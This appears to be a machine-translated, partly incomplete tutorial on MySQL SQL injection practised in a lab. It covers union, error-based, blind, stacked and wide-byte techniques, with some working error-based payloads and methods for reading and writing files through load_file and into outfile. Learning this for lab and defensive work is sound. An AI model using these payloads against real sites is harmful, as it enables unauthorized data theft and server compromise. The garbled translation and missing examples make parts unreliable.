0. PHPStorm Code debugging method
phpstorm Startup debugging method :
add &XDEBUG_SESSION_START=PHPSTORM You can start debugging
phpstorm Method of dynamically modifying variables during debugging :
Press on specific variables during debugging F2 You can modify the variable content or right-click and press Set Value... option
1. Joint query injection
Utilization premise :
There are display bits on the page
advantage :
Convenient and fast , Easy to use
shortcoming :
Display bit required
to subdivide :
* Character injection
Practice it :
Successful injection :
It can be constructed as follows to determine whether there is character type injection :
* Integer injection
Practice it :
success
Combined injection and utilization order by and group by Determine the number of columns in the table
order by The column number can be followed , For example, sorting in the first column is order by 1 and so on
if order by The selected column number does not exist , It will display normally
If the selected column number is too large , The following error will be reported
In this way, the dichotomy slowly reduces the scope and can quickly determine the total number of columns , So as to facilitate joint injection
If not available order by, You can use group by To determine the number of columns
It can be constructed as follows , That is, it is followed by an arithmetic expression , If 1+2 Query and direct write 3 The same result indicates the existence of integer injection :
2. Method of listing all databases with injection
The most important database is information_schema, Among them 3 A very important table :
* schemata Tabular schema_name Include database name
* tables In the table table_schema Corresponding database name , table_name This corresponds to the set of table names that exist in the database
* columns In the table column_name Corresponding column name ,table_schema and table_name Corresponding database and table names
Get all database name methods :
Results obtained :
Method to get the table name of a specific database :
Results obtained :
Method to get the column name of a specific table :
Results obtained :
3. Load_file as well as into outfile Use of
adopt mysql utilize load_file() Function sum selectt ... into outfile ... To read and write files
1. load_file() Function read content
Windows If under mysql configuration file my.ini in
1.
default secure_file_priv Option does not exist by default ( Namely secure_file_priv=null), The query is displayed as NULL. In this case, it is not allowed to pass any file mysql Read and write (mysql5.2 This is the default setting for future versions )
2. limit mysqld Import of , Export can only occur on /tmp Directory secure_file_priv=/tmp/
3. incorrect mysqld Import of , Export as limit secure_file_priv=
Linux The next is /etc/my.cnf file
utilize mysql A file was read remotely
use load_file Function to read the contents of the file :
* Absolute path
* Must be root Read file permissions
* secure_file_priv Cannot be NULL
2. select into outfile Write content
Conversion of file name to is not allowed 16 Binary to write
use select...into outfile... Conditions for writing file contents :
* Absolute path
* Must be root Permission to write to file
* secure_file_priv Cannot be NULL
* Single and double quotation marks can be used ( Because the file must have single and double quotation marks )
Try to use load_file Read local content :
Results obtained :
It seems that there is no result , Choose to view the source code and immediately find the contents of the file
Try to use select ... into outfile ... write file
4. Error-based SQL injection ( Error injection )
Utilization premise :
No bits need to be displayed on the page , But output is required sql Statement execution error message , such as mysqli_error() or mysql_error()
advantage :
No display bits are required
shortcoming :
need mysql_error() perhaps mysqli_error() Error reporting information
Columns should be considered in conjunction with joint query injection
-- Note here that the error message is 2 column , Because there is an error in one of the columns . If you start select If there are multiple columns in, a new column should be added in the later union injection select 1, 2 union
select count(*), (concat(floor(rand(0)*2), (select user())))x from mysql.user
group by x;
The second method does not need to consider the number of columns , as long as where Just the back :
select 1 from dual where 1=1 and (select 1 from (select
count(*),concat((select user()),floor(rand(0)*2))x from mysql.user group by x)a)
Let's take an example :
extractvalue Error injection
Pass here extractvalue() Error injection , There are restrictions on the display of content. Only parts can be displayed
To solve this problem, use substr Function to get the following content
extractvalue(xml string,
String to extract ) Similar should be written after the original in '/../../...' Formatted string , But what we put at the top here is 0x7e Namely ~ symbol . Therefore, an error is reported , It returns the contents of the string to be extracted , That is, the information we need
updatexml Error injection
It also has the problem of incomplete display , For complete content, you can substr Obtained by segment display
stay sqli Try to use extractvalue Error reporting and injection xmlupdate Error injection :
This is the use of extractvalue Error injection :
This is the use of xmlupdate Error injection :
5. Boolean-based blind SQL injection (bool Blind injection )
Utilization premise :
There are no display bits on the page , No output SQL Statement execution error message
It is not normal to return positive only through the page
advantage :
No display bits are required , No error messages are required
shortcoming :
Slow speed , It takes a lot of time
Used here sleep() function , Sleep if successful 10 second
here 1=2 Absolutely not , If id It's a double quotation mark package , Then it can run normally here ( Double quotation mark direct extraction 1 Ignore subsequent non numeric content ), If it is a single quotation mark , It should be an error, that is, nothing is displayed .
This method finds the corresponding user name through the dichotomy of letters
Why is there no echo bit ?
If you encounter no matter sql There is no echo when the statement is executed correctly or fails , Only the following can be used bool Injection attempts to inject and cooperate with dichotomy , If there is a delay ascii Within the corresponding range
Try experiment :
6. Stack SQL injection
This injection method is rarely used , Because now use mysqli_multi_query() function , The function is not multiple sql Execute together , Instead, execute only one .
If you want to execute multiple sql sentence , Need to add mysqli_next_result() implement .
This causes Stack Injection to execute only the first one sql sentence , The following statement cannot be executed , Look at an example :
hinder select sleep(5) Cannot execute , Unless mysqli_next_result() call .
7. Wide character injection
The purpose of wide character injection is to solve addslashes() The problem of adding escape to functions such as . The premise of its use is mysql Wide bytes will be used , For example, set wide byte encoding sql sentence :
set names gbk/gb2312/GB18030/BIG5...
utilize phpstorm debugging , Take an example :
Joint injection is used here , Internal call 3 second preg_replace(), hold \ Replaced with \\\, And escaped single quotation marks and double quotation marks .
After the function returns, it is found that the single quotation mark has been escaped
If you set the character set to gbk perhaps gb2312 Wide characters like .mysql Will put ascii Code greater than 128(%80) The character of is regarded as the first byte of Chinese character ( There are Chinese characters altogether 2 Bytes ,
greater than 128 The following byte will be used as the second byte of Chinese characters )
Take advantage of this feature , We construct such an injection statement
The result input part is like this
The whole statement becomes like this , This eliminates the problem of escape .
The content is displayed successfully
How to quickly determine whether there is sql injection ?
* Four arithmetic , See if the corresponding value is returned , such as 2-1 and 1 Are they equal , If equal, it may be an integer or there is no injection problem
* See if there is an error , utilize ' and " Symbol , See if there is an error message
* and 1=1/and 1=2 See if the page changes , If there is no change, there is probably no injection
* Time based and sleep(10) See if the page returns after a period of time
Injection mode classification :
* Joint query injection
* Error based injection
* be based on bool injection
* Time based injection
* Stack Injection
Injection type classification :
* Character injection
* Integer injection
( Unfinished )
Technology